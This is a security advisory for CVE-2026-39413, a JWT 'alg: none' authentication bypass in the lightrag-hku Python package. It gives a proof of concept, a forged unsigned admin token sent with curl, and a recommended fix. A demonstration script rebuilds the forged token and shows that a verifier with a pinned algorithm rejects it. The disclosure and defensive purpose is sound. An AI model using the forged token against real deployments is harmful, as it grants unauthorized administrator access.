GHSA-8ffj-4hx4-9pgf

Source
https://github.com/advisories/GHSA-8ffj-4hx4-9pgf
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-8ffj-4hx4-9pgf/GHSA-8ffj-4hx4-9pgf.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-8ffj-4hx4-9pgf
Aliases
  • CVE-2026-39413
Published
2026-04-08T00:17:50Z
Modified
2026-05-05T16:04:40.864938Z
Severity
  • 4.2 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N
Summary
lightrag-hku: JWT Algorithm Confusion Vulnerability
Details

Summary

The LightRAG API is vulnerable to a JWT algorithm confusion attack in which an attacker forges a token by setting 'alg': 'none' in the JWT header. Because the jwt.decode() call does not pin the accepted algorithms to a fixed list, and so never explicitly excludes 'none', a crafted token that carries no signature can be accepted as valid, giving unauthenticated access to protected resources.

Details

In lightrag/api/auth.py at line 128, the validate_token method calls:

payload = jwt.decode(token, self.secret, algorithms=[self.algorithm])

The allow-list passed to algorithms is built from the runtime-configured self.algorithm rather than from a fixed constant, so nothing in the code itself rules out 'none': whatever algorithm the configuration names is the one the verifier accepts, and a token whose header matches it is processed. The code never explicitly states that 'none' is not allowed, which is what makes an authentication bypass with an unsigned token possible.

Before triaging a deployment, check which JWT library and which configured algorithm it runs with. PyJWT 2.x raises InvalidAlgorithmError for any token whose header alg is absent from the algorithms list, and its 'none' implementation never reports a valid signature, so an unsigned token only gets through where the configured algorithm (or a different library that does not enforce the list) admits 'none'. A hardcoded allow-list, as in the recommended fix, removes that dependency on configuration.

PoC

An attacker can generate a JWT with the following structure:

{
  "header": {
    "alg": "none",
    "typ": "JWT"
  },
  "payload": {
    "sub": "admin",
    "exp": 1700000000,
    "role": "admin"
  }
}

Then send a request like the following (the endpoint path is a placeholder; note that the exp value 1700000000 lies in the past, so a live attempt needs a future expiry or the token fails the expiry check regardless of the algorithm issue):

curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://localhost:8000/api/protected-endpoint

Impact

An attacker can impersonate any user, including administrators, by forging a JWT with 'alg': 'none', gaining full access to protected resources without needing valid credentials.

Recommended Fix

Explicitly specify allowed algorithms and exclude 'none'. Modify the validate_token method to:

# Never let a configured 'none' reach jwt.decode(); fall back to the HMAC family instead.
allowed_algorithms = [self.algorithm] if self.algorithm != 'none' else ['HS256', 'HS384', 'HS512']
payload = jwt.decode(token, self.secret, algorithms=allowed_algorithms)

Or better yet, hardcode the expected algorithm(s):

payload = jwt.decode(token, self.secret, algorithms=['HS256'])
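The following added example (not code from LightRAG or from the advisory) reproduces the forged alg:none token from the PoC above byte for byte and runs it through a verifier that pins the algorithm the way the recommended fix does. It uses only the standard library, so validate_token() here is a stand-in for the behaviour the hardened jwt.decode() call should have, not PyJWT itself; the secret, the allow-list and the fresh expiry are assumptions made for the demonstration.

```python
"""Added example: reproduce the advisory's alg:none token and check it against
a verifier that pins the algorithm, as the recommended fix does. Not code from
LightRAG or from the advisory; standard library only, so validate_token() is a
stand-in for what the hardened jwt.decode() call should do, not PyJWT itself.
The secret, the allow-list and the fresh expiry are assumptions for the demo."""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

SECRET = b"example-secret-do-not-use"  # assumed signing key, constructed for this demo
ALLOWED_ALGORITHMS = ("HS256",)        # pinned allow-list; 'none' can never appear here
HMAC_DIGESTS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj: dict) -> str:
    # Compact separators and insertion order reproduce the advisory's token byte for byte.
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def forge_none_token(payload: dict) -> str:
    """Attacker side: alg=none header, no signature, trailing dot kept."""
    header = {"alg": "none", "typ": "JWT"}
    return f"{encode_segment(header)}.{encode_segment(payload)}."


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Server side: the legitimate way to mint a token for this verifier."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{encode_segment(header)}.{encode_segment(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def validate_token(token: str, secret: bytes, now: Optional[int] = None) -> dict:
    """Check the header alg against the pinned list before anything else is trusted."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token: expected three segments")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    alg = header.get("alg") if isinstance(header, dict) else None
    if alg not in ALLOWED_ALGORITHMS:   # 'none', 'None', RS256, missing alg: all refused here
        raise ValueError(f"algorithm {alg!r} not allowed")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), HMAC_DIGESTS[alg]).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(payload_b64))
    now = int(time.time()) if now is None else now
    exp = payload.get("exp") if isinstance(payload, dict) else None
    if not isinstance(exp, int) or exp <= now:
        raise ValueError("token expired or missing exp")
    return payload


def check(token: str, now: Optional[int] = None) -> str:
    """'accepted' or 'rejected: <reason>', so each case can be compared side by side."""
    try:
        validate_token(token, SECRET, now)
        return "accepted"
    except ValueError as exc:
        return f"rejected: {exc}"


# Header and payload from the advisory's PoC; the bearer token from its curl line.
ADVISORY_PAYLOAD = {"sub": "admin", "exp": 1700000000, "role": "admin"}
ADVISORY_TOKEN = ("eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0."
                  "eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0.")

if __name__ == "__main__":
    assert forge_none_token(ADVISORY_PAYLOAD) == ADVISORY_TOKEN
    fresh = {**ADVISORY_PAYLOAD, "exp": int(time.time()) + 3600}  # PoC exp is already past
    print("forged alg:none  ->", check(forge_none_token(fresh)))
    print("HS256, our key   ->", check(sign_hs256(fresh, SECRET)))
    print("HS256, wrong key ->", check(sign_hs256(fresh, b"not-our-key")))
```

The forged token is refused on the algorithm check alone, before the signature or the expiry are examined, which is the property the hardcoded allow-list buys: the header's alg field is treated as an untrusted claim to be matched against the server's own list, never as an instruction to the verifier. Extending ALLOWED_ALGORITHMS beyond the HMAC family would need a matching non-HMAC verify path, which this stand-in deliberately does not provide.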
Database specific
{
    "github_reviewed_at": "2026-04-08T00:17:50Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-347"
    ],
    "nvd_published_at": "2026-04-08T20:16:25Z",
    "severity": "MODERATE"
}
Affected packages

PyPI / lightrag-hku

Affected ranges

  • Type: ECOSYSTEM
  • Introduced: 0 (unknown introduced version; all previous versions are affected)
  • Fixed: 1.4.14

Affected versions

0.*
0.0.2
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.0.9
1.*
1.0.0
1.0.1
1.0.3
1.0.5
1.0.6
1.0.8
1.0.9
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.1.5
1.1.6
1.1.7
1.2.1
1.2.2
1.2.3
1.2.5
1.2.6
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.3.5
1.3.6
1.3.7
1.3.8
1.3.9
1.4.0
1.4.1
1.4.2
1.4.3
1.4.4
1.4.5
1.4.6
1.4.7
1.4.8rc4
1.4.8rc6
1.4.8rc7
1.4.8rc8
1.4.8rc9
1.4.8.1
1.4.8.2
1.4.9rc1
1.4.9rc2
1.4.9rc3
1.4.9rc4
1.4.9
1.4.9.1
1.4.9.2
1.4.9.3
1.4.9.4rc1
1.4.9.4
1.4.9.5
1.4.9.6
1.4.9.7
1.4.9.8
1.4.9.9
1.4.9.10
1.4.9.11
1.4.10
1.4.11rc2
1.4.11
1.4.12rc1
1.4.12
1.4.13rc1
1.4.13

Database specific

  • last_known_affected_version_range: "<= 1.4.13"
  • source: "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-8ffj-4hx4-9pgf/GHSA-8ffj-4hx4-9pgf.json"